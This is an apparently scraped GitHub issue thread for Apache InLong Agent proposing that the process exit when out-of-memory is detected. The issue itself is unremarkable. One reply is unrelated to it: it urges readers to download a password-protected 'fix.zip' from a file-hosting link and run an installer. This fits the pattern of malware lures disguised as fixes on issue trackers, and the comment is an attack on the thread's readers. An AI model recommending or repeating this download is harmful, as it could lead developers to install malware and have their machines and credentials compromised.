### ISSUE TITLE
[Improve][Agent] When detecting oom, it is recommended to exit the process

### ISSUE THREAD

**Issue by justinwwhuang** [apache/inlong#10889]
### Description

When detecting oom, it is recommended to exit the process

### InLong Component

InLong Agent

### Are you willing to submit PR?

- [X] Yes, I am willing to submit a PR!

### Code of Conduct

- [X] I agree to follow this project's [Code of Conduct](https://www.apache.org/foundation/policies/conduct)

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
